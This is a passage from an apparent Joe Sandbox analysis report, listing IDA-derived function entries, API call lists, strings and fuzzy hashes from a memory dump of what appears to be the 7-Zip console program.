                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$fputsmemset
                                              • String ID:
                                              • API String ID: 469995913-0
                                              • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                              • Instruction ID: 02821c66c6c1aa8af6f2b53357892f01ca6c86bda96eca3145d412c6ff0b7a40
                                              • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                              • Instruction Fuzzy Hash: 59F09C23352D4181CB10FF32D95252E2321E7C3B6DB045267AF6D573ABCE68C44ACA4C
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmovewcscmp
                                              • String ID:
                                              • API String ID: 3584677832-0
                                              • Opcode ID: c7d24e90d75f8b1a8df411daada06ff9b67f26deec57412286e52ff39d8a267a
                                              • Instruction ID: c633660aeed548b886b464572bd04f8efa8af28ad182aa8a603e9e0fc6b99d26
                                              • Opcode Fuzzy Hash: c7d24e90d75f8b1a8df411daada06ff9b67f26deec57412286e52ff39d8a267a
                                              • Instruction Fuzzy Hash: 1C51B033201E4596CA20EF1AE5900AE7362F394B99756C12BDF5D0B729DE3CC98AC708
                                              APIs
                                              • free.MSVCRT(?,?,?,?,?,00000000,00451774,?,?,?,?,?,?,?,FFFFFFFF), ref: 00451558
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                              • API String ID: 1294909896-2104980125
                                              • Opcode ID: ed70e3db481bbb30983a976b6095b32a572669940faca3c9e13180f1720175d4
                                              • Instruction ID: 58c758c65da6a95e0f14e7f28ea372c41a6c2a0d7785ce516bb63faf30a2abe4
                                              • Opcode Fuzzy Hash: ed70e3db481bbb30983a976b6095b32a572669940faca3c9e13180f1720175d4
                                              • Instruction Fuzzy Hash: 0151E472214594A6CF21DF25D5407AE3761F38239AF449227DE4A47727EB7CC98EC708
                                              APIs
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,0046141F), ref: 004604EE
                                                • Part of subcall function 0045FEC8: _CxxThrowException.MSVCRT ref: 0045FF2F
                                                • Part of subcall function 0045FEC8: free.MSVCRT ref: 0045FFAE
                                                • Part of subcall function 0045FEC8: _CxxThrowException.MSVCRT ref: 0045FFD1
                                                • Part of subcall function 0045FEC8: _CxxThrowException.MSVCRT ref: 0045FFF7
                                                • Part of subcall function 0045FEC8: _CxxThrowException.MSVCRT ref: 0046002B
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,0046141F), ref: 00460523
                                              • _CxxThrowException.MSVCRT ref: 00460564
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$free
                                              • String ID: Incorrect wildcard type marker$Too short switch
                                              • API String ID: 3129652135-1817034180
                                              • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                              • Instruction ID: c1b660ff96c4c656bcac565e5e5202a9b6f6c5f8b3f38fec242eb4ac78651057
                                              • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                              • Instruction Fuzzy Hash: 555190632086D495CB20DB16E45079FBB20F786798F94811BEF8A07B55EB7CC586CB0A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID: #
                                              • API String ID: 1534225298-1885708031
                                              • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                              • Instruction ID: 22eb3e36ba111598fe5d70971924c6ad4ed92f1d58486288bfb6198476543320
                                              • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                              • Instruction Fuzzy Hash: C4515C26315B8482CB60DB26E4803AE7761F7C9B94F544616EF9E437A5DF3CC84AC709
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: memsetstrlen$fputs
                                              • String ID:
                                              • API String ID: 2256168112-2735817509
                                              • Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                              • Instruction ID: a2dc69db676daca64215850cfdc5fe1c67017c1eb0268c54d5d41c4cb335f258
                                              • Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                              • Instruction Fuzzy Hash: B341B4622047C0A5CF24EB26E5513AF6B61F784B88F485537DE8A07719CEBCC589CB44
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ErrorLastfree
                                              • String ID:
                                              • API String ID: 2167247754-0
                                              • Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                              • Instruction ID: 3f4c8bb93d10a024fffbaddb25e400e32316ad764f47b189930c8fb85cc81937
                                              • Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                              • Instruction Fuzzy Hash: 3E41786121964095CA20EB15E4913AFB360F7D2765F50022BEE9D87B97DF2CCD4EC709
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$FileMove
                                              • String ID:
                                              • API String ID: 288606353-0
                                              • Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                              • Instruction ID: 123fcec61a54d0f1d33a0ddc964d3ea41668e99f0c19edc05877649b2de92fbb
                                              • Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                              • Instruction Fuzzy Hash: C711D81330594145CE20EF26E85026F67209BC3BD6F895227BE6A97367DE2DCC8EC708
                                              APIs
                                                • Part of subcall function 0045794C: FindClose.KERNELBASE ref: 0045795E
                                              • SetLastError.KERNEL32 ref: 00457BAA
                                              • SetLastError.KERNEL32 ref: 00457BB9
                                              • FindFirstStreamW.KERNELBASE ref: 00457BDB
                                              • GetLastError.KERNEL32 ref: 00457BEA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ErrorLast$Find$CloseFirstStream
                                              • String ID:
                                              • API String ID: 4071060300-0
                                              • Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                              • Instruction ID: efa31ce3501c9327476fc55f49bb9d213409eb415063de55407e3048be763205
                                              • Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                              • Instruction Fuzzy Hash: 1921B562208B4082DA219B35F48436A2361FB8A77AF545372DFBA437E6DF3CC54DC205
                                              APIs
                                              • free.MSVCRT ref: 00497DA9
                                              • free.MSVCRT ref: 00497DB2
                                              • free.MSVCRT ref: 00497DE5
                                              • free.MSVCRT ref: 00497DF2
                                              • free.MSVCRT ref: 00497DFB
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 004794DB
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 004794E3
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 004794F0
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 0047951C
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 00479525
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 0047952D
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 0047953A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: l}I
                                              • API String ID: 1294909896-723326425
                                              • Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                              • Instruction ID: 01890cb0c5503ca3e754d4cb6f6602a3a14a37e0a5d274bee1f66780165d1494
                                              • Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                              • Instruction Fuzzy Hash: AD018423712D4089DA11AF26DD513A92724EB46FA9F1802379F0D07316EE28CC47C388
                                              APIs
                                              Strings
                                              • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 0049CD2A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputsfree
                                              • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                              • API String ID: 2581285248-171671738
                                              • Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                              • Instruction ID: c211f97c745a7395f334a231c2997adbf6c0bdcf4c9d0d8dbc7f04c8b67743e9
                                              • Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                              • Instruction Fuzzy Hash: 2D31746220894486EE309B14D9D576B2B21E3857D5F480237EF4B077A6CB5CCCA6970D
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID:
                                              • API String ID: 1534225298-0
                                              • Opcode ID: 150ae877ff484c22bc24b8578f302cb24d5b1ad4491463f4b87d27cac02bb206
                                              • Instruction ID: 6c9556f04c61baea041358bdb288295bf89ed217c2422a62e4a7e0c72571889b
                                              • Opcode Fuzzy Hash: 150ae877ff484c22bc24b8578f302cb24d5b1ad4491463f4b87d27cac02bb206
                                              • Instruction Fuzzy Hash: F921922321594051CA20EF22E44125E6720EBC27DAF445267BE5E577BBDE2CC54EC708
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$fputc
                                              • String ID: Time =
                                              • API String ID: 1185151155-458291097
                                              • Opcode ID: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                              • Instruction ID: cc7f229fcc5b5d3a8730e19356868035b4b1fd417624e12d0f4ef75da584fe26
                                              • Opcode Fuzzy Hash: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                              • Instruction Fuzzy Hash: 34216395340A1585EA18AF1BE9913565722A798FC4F09E036DE1E4776DDE3CC85AC308
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                              • String ID:
                                              • API String ID: 202075352-0
                                              • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                              • Instruction ID: 34e13b195729b07aea194c61a3c05aff6fe3c2d6f6fb5e3e38765a19188a1d42
                                              • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                              • Instruction Fuzzy Hash: 3121D373221A50C7DB20EF2AD44566D3320F345BE9F9013279F29076A8DF39D84ACB08
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: AddressDiskFreeHandleModuleProcSpace
                                              • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                              • API String ID: 1197914913-1127948838
                                              • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                              • Instruction ID: 39c3900ca42c008714ea051718930ff0baf54c5a216c050613de3b99432f8c63
                                              • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                              • Instruction Fuzzy Hash: C211567231AB4696DB11CF55F484B9AB364F794B80F445022EB8A43728EF3CC559CB00
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                              • Instruction ID: e23ae12f59a64a380e7014d09817d8532a3da04c62bc2c89b4f6d02e6ddb8d3f
                                              • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                              • Instruction Fuzzy Hash: 24113023712D8085CB10AF36D95166A2320EBC7FADF1892779F6D57796CE68C84BC708
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                              • Instruction ID: 59d5079464283cc5fe42bec2198ca1d7e2686d25dc3ac5b1580a37728ee6e5f6
                                              • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                              • Instruction Fuzzy Hash: 9601E923702C80498B21EE37DE0116A1320EB82FE97194227DF2D1B34ADE68CC438748
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                              • Instruction ID: 456c9889be021710d153187fe99e5afbc046e6e39ce48688e607bf090b01d20d
                                              • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                              • Instruction Fuzzy Hash: A6116523703D4185C620BF37D95066E2310EB83FA9F0842779F6D5B3A6CE28C84AC748
                                              APIs
                                              • fputs.MSVCRT ref: 00496B7C
                                                • Part of subcall function 00456618: FormatMessageW.KERNEL32 ref: 00456676
                                                • Part of subcall function 00456618: LocalFree.KERNEL32 ref: 00456698
                                                • Part of subcall function 00452320: free.MSVCRT ref: 0045237E
                                                • Part of subcall function 00452320: fputs.MSVCRT ref: 004523B8
                                                • Part of subcall function 00452320: free.MSVCRT ref: 004523C4
                                                • Part of subcall function 00452300: fputc.MSVCRT ref: 00452311
                                              • free.MSVCRT ref: 00496BAE
                                              • fputs.MSVCRT ref: 00496BCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputsfree$FormatFreeLocalMessagefputc
                                              • String ID: : $----------------
                                              • API String ID: 1215563195-4071417161
                                              • Opcode ID: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                              • Instruction ID: 1d807169d2658efa3cbbe3ed6feffafd39839de053a5501761fcd94679b560d5
                                              • Opcode Fuzzy Hash: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                              • Instruction Fuzzy Hash: 3F0182A270090495CA20EF26E98062E2320F785BE9F448237EF6E43795DE3CD44AC704
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                              • Instruction ID: 31820e1e16d8d1df120b2ed2683025a90afe1c44adebbed240193a886c80f5a2
                                              • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                              • Instruction Fuzzy Hash: A2F08123702C5185CB20AF37CE5116E2720ABC7FDA7090167AF1D4B356CE68C8478788
                                              APIs
                                              • fputs.MSVCRT ref: 0049BCD4
                                                • Part of subcall function 00452320: free.MSVCRT ref: 0045237E
                                                • Part of subcall function 00452320: fputs.MSVCRT ref: 004523B8
                                                • Part of subcall function 00452320: free.MSVCRT ref: 004523C4
                                              • fputs.MSVCRT ref: 0049BD17
                                                • Part of subcall function 00452300: fputc.MSVCRT ref: 00452311
                                              • free.MSVCRT ref: 0049BD2B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputsfree$fputc
                                              • String ID: : $Write SFX:
                                              • API String ID: 3584323934-2530961540
                                              • Opcode ID: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                              • Instruction ID: 5563ddd645eba90f9c637ae16d407e4870a97086500041f72248f4a5ba41237d
                                              • Opcode Fuzzy Hash: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                              • Instruction Fuzzy Hash: 850167A230094090DE20DF26E95435E5321E785FF9F48D333AE2E477A9DE2CC58AC704
                                              APIs
                                              • fputs.MSVCRT ref: 0049BB49
                                              • fputs.MSVCRT ref: 0049BB76
